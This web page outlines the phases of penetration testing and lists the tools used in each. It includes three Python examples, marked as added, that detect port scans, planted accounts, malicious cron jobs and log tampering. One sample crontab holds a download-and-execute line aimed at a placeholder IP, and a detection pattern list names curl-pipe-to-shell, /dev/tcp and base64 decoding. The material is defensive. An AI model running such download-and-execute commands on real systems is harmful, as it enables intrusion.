Trojent

We are live!

Methodology - Phases of Penetration Testing

1. Reconnaissance

Reconnaissance is the first step in ethical hacking. It is often referred to as footprinting. Here, a hacker collects various kinds of data, such as employee information, IP addresses, network topology, and domain names, using active and passive approaches. The purpose is to build a map of the target's digital and physical assets.

Active Reconnaissance: This method involves direct interaction with the target system, so it may alert the target to the probing.

Passive Reconnaissance: This means collecting data from third-party sources without direct contact with the target, so it leaves no trace on the target's own systems.

Popular Tools & Techniques Used are:

  • Nmap
  • Whois
  • Dig
  • Nslookup
  • DNS Enumeration
  • Google Dorking

2. Scanning

Once enough information has been gathered, the hacker moves on to the scanning stage. Scanning identifies open ports, active devices, and services in the targeted network. It also helps to identify areas of vulnerability that can be targeted. Scanning is usually divided into three categories:

  • Port Scanning: Finding open ports or services with Nmap or Angry IP Scanner.
  • Vulnerability Scanning: Detecting known weaknesses in systems and applications using Nessus.
  • Network Mapping: Creating a blueprint of network topology with tools such as SolarWinds.

Popular Tools & Techniques Used are:

  • Nessus
  • OpenVAS
  • Nikto
  • ZAProxy
  • Banner Grabbing
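The flip side of the scanning phase is detecting it. The following is an added example, not Trojent's code or part of the original page: it runs a simple port-scan heuristic over a few constructed firewall log lines. The log format (`<timestamp> ALLOW|DENY <src> -> <dst>:<port>`), the 60-second window and the threshold of 8 distinct ports are all assumptions chosen for the example, not any vendor's format or defaults.

```python
"""Added example (not Trojent's code): flag port-scan behaviour in firewall logs.

Heuristic: one source touching many distinct destination ports on one host within
a short window is behaving like a port scanner. Format and thresholds are assumed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# Constructed sample lines in the assumed "<ts> ACTION <src> -> <dst>:<port>" format.
SAMPLE_LOG = """\
2024-05-01T10:00:00 DENY 203.0.113.7 -> 192.0.2.10:21
2024-05-01T10:00:00 DENY 203.0.113.7 -> 192.0.2.10:22
2024-05-01T10:00:01 DENY 203.0.113.7 -> 192.0.2.10:23
2024-05-01T10:00:01 DENY 203.0.113.7 -> 192.0.2.10:25
2024-05-01T10:00:02 DENY 203.0.113.7 -> 192.0.2.10:80
2024-05-01T10:00:02 DENY 203.0.113.7 -> 192.0.2.10:110
2024-05-01T10:00:03 DENY 203.0.113.7 -> 192.0.2.10:143
2024-05-01T10:00:03 DENY 203.0.113.7 -> 192.0.2.10:443
2024-05-01T10:00:04 DENY 203.0.113.7 -> 192.0.2.10:445
2024-05-01T10:00:04 DENY 203.0.113.7 -> 192.0.2.10:3389
2024-05-01T10:00:05 ALLOW 198.51.100.4 -> 192.0.2.10:443
2024-05-01T10:00:06 ALLOW 198.51.100.4 -> 192.0.2.10:443
2024-05-01T10:30:00 DENY 198.51.100.9 -> 192.0.2.10:22
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>ALLOW|DENY) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<port>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "action": m["action"],
        "src": m["src"],
        "dst": m["dst"],
        "port": int(m["port"]),
    }


def detect_port_scans(log_text, window=timedelta(seconds=60), min_ports=8):
    """Return {(src, dst): sorted ports} for pairs that hit >= min_ports distinct
    ports inside any single time window of the given length."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            events[(ev["src"], ev["dst"])].append((ev["ts"], ev["port"]))

    findings = {}
    for pair, hits in events.items():
        hits.sort()  # time order so the sliding window below is valid
        best = set()
        start = 0
        for end in range(len(hits)):
            # shrink the window from the left until it fits inside `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            ports = {p for _, p in hits[start:end + 1]}
            if len(ports) > len(best):
                best = ports
        if len(best) >= min_ports:
            findings[pair] = sorted(best)
    return findings


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src} against {dst}: {len(ports)} ports {ports}")
```

Only the first source trips the heuristic; the repeated HTTPS connections from 198.51.100.4 and the single SSH attempt from 198.51.100.9 stay below the threshold. In practice the window and port count are tuned per environment, and a slow scan spread over hours needs a longer window or a per-source daily count to catch.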

3. Gaining Access

During this crucial stage, the intruder uses the weaknesses identified during scanning to gain unauthorized entry into the target system. This may involve leveraging application, operating-system, or network flaws. The objective is to establish access at different privilege levels, from user accounts to administrative control.

Exploitation Methods comprise buffer overflows, SQL injection, and cross-site scripting (XSS).

Popular Tools & Techniques Used are:

  • Metasploit
  • SQLmap
  • Hydra
  • CrackMapExec
  • BurpSuite
  • Hashcat
  • Webshells
  • Misconfigurations
  • John The Ripper
  • Public Exploits

4. Persistence

Once inside, the intruder must maintain a presence on the target machine for further actions such as gathering or monitoring sensitive data. Therefore, backdoors, rootkits, or Trojan horses may be installed at this point to ensure continued access to the device even after it has been rebooted or patched.

Persistence Techniques: Employing malicious programs, establishing concealed user accounts, or exploiting cron jobs.

Popular Tools & Techniques Used are:

  • Netcat
  • User Creation
  • Service hijacking
  • Privilege Escalation
  • Reverse Shells
  • Payloads & Cronjobs
  • Tunneling
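From the defender's side, the persistence techniques listed above (concealed user accounts, cron-based payloads) leave artefacts that can be audited. The script below is an added example and not Trojent's code: it checks constructed `/etc/passwd` and crontab contents for a second UID 0 account, unexpected login shells, home directories in temporary locations, and cron commands that download and execute or decode inline content. The file contents, the baseline user set and the pattern list are assumptions for the example; a real audit would compare against a recorded baseline from the same host.

```python
"""Added example (not Trojent's code): audit constructed passwd and crontab content
for the persistence artefacts the page lists (hidden accounts, cron-based payloads).

All file contents below are constructed samples; the suspicious patterns are a
small assumed starting set for illustration, not a complete detection ruleset.
"""
import re

# Constructed /etc/passwd: a second UID 0 account with a temp-dir home, and a
# system account whose shell was changed to an interactive one.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
sysupd:x:0:0:System Update:/var/tmp:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/sh
"""

# Constructed crontab: a legitimate nightly backup and a job that fetches and
# runs remote content every minute.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
* * * * * /bin/sh -c 'curl -s http://203.0.113.7/u | sh'
"""

# Accounts expected to have an interactive shell (assumed baseline for the example).
BASELINE_SHELL_USERS = {"root", "alice"}
NOLOGIN_SHELLS = ("/usr/sbin/nologin", "/sbin/nologin", "/bin/false")

# Command fragments that rarely belong in an ordinary cron job (assumed set).
SUSPICIOUS_CRON = [
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),  # download-and-execute
    re.compile(r"base64\s+(-d|--decode)"),           # decoded inline payload
    re.compile(r"/dev/tcp/"),                        # shell network redirection
    re.compile(r"/dev/shm/|/tmp/"),                  # executables staged in temp dirs
]


def audit_passwd(passwd_text, baseline=BASELINE_SHELL_USERS):
    """Return a list of human-readable findings for suspicious passwd entries."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, _gid, _gecos, home, shell = line.split(":")
        if uid == "0" and name != "root":
            findings.append(f"extra UID 0 account: {name}")
        if shell not in NOLOGIN_SHELLS and name not in baseline:
            findings.append(f"unexpected login shell for {name}: {shell}")
        if home.startswith(("/tmp", "/var/tmp", "/dev/shm")):
            findings.append(f"home directory in a temp location for {name}: {home}")
    return findings


def audit_crontab(cron_text, patterns=SUSPICIOUS_CRON):
    """Return a list of findings for cron entries whose command matches a pattern."""
    findings = []
    for line in cron_text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)  # five schedule fields, then the command
        if len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        if any(p.search(command) for p in patterns):
            findings.append(f"suspicious cron command ({schedule}): {command}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_crontab(SAMPLE_CRONTAB):
        print("FINDING:", finding)
```

The `sysupd` entry produces three findings on its own (duplicate UID 0, interactive shell, temp-directory home), which is the point: a planted account usually breaks several expectations at once, so even a short rule set catches it. The same checks extend naturally to `/etc/cron.d/*`, per-user crontabs and systemd timer units.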

5. Clearing Tracks

The final phase of ethical hacking revolves around ensuring the hacker remains under the radar. This means wiping logs, concealing files, and manipulating timestamps to eliminate evidence of the attack. The intention is to prevent the attack from being detected or traced back through its methodology.

Popular Tools & Techniques Used are:

  • History deletion
  • Backdoors removal
  • Logs clearance
  • Created Users deactivation
  • Created Groups deactivation
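Log wiping and timestamp manipulation are hard to do cleanly, and the traces they leave are what incident responders look for. The following is an added example, not Trojent's code: it scans a constructed syslog extract for two tell-tale signs, entries whose timestamps go backwards (rewritten or re-ordered records) and silent gaps far longer than the host's normal activity (removed records). The log format and the 10-minute gap threshold are assumptions for the example; a real check would use the host's actual heartbeat interval, such as an hourly cron run.

```python
"""Added example (not Trojent's code): spot signs of log tampering in a constructed
syslog extract, the counter-measure to the "clearing tracks" phase.

Checks: timestamps moving backwards and gaps longer than max_gap. Format and
threshold are assumptions for the example.
"""
from datetime import datetime, timedelta

# Constructed extract: the 11:00 hourly cron entry and the 11:20 logout have been
# tampered with, leaving a long gap and an out-of-order record.
SAMPLE_SYSLOG = """\
2024-05-01T10:00:00 host1 cron[410]: (root) CMD (run-parts /etc/cron.hourly)
2024-05-01T10:05:00 host1 sshd[5120]: Accepted publickey for alice from 198.51.100.4
2024-05-01T10:05:30 host1 sudo: alice : TTY=pts/0 ; COMMAND=/bin/systemctl status nginx
2024-05-01T11:40:00 host1 cron[410]: (root) CMD (run-parts /etc/cron.hourly)
2024-05-01T11:20:00 host1 sshd[5120]: session closed for user alice
2024-05-01T11:45:00 host1 systemd[1]: Started Daily apt download activities.
"""


def parse_ts(line):
    """The assumed format puts an ISO 8601 timestamp as the first token."""
    return datetime.fromisoformat(line.split(" ", 1)[0])


def find_log_anomalies(text, max_gap=timedelta(minutes=10)):
    """Return a list of (kind, line_number, detail) tuples.

    kind is "gap" when the interval to the previous record exceeds max_gap and
    "out_of_order" when a record is older than the newest record seen so far."""
    anomalies = []
    newest = None
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        ts = parse_ts(line)
        if newest is not None:
            if ts < newest:
                anomalies.append(("out_of_order", n, newest - ts))
            elif ts - newest > max_gap:
                anomalies.append(("gap", n, ts - newest))
        # track the newest timestamp seen so an older record does not reset the baseline
        newest = ts if newest is None else max(newest, ts)
    return anomalies


if __name__ == "__main__":
    for kind, line_no, delta in find_log_anomalies(SAMPLE_SYSLOG):
        print(f"line {line_no}: {kind} ({delta})")
```

A gap by itself is only a lead (quiet hosts have them), but a gap that coincides with a missing scheduled entry, or with records arriving out of order, is a strong signal. Shipping logs to a remote collector as they are written is what makes this check trustworthy, because the attacker cannot edit what has already left the host.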


Copyright © 2026 Trojent - All Rights Reserved.
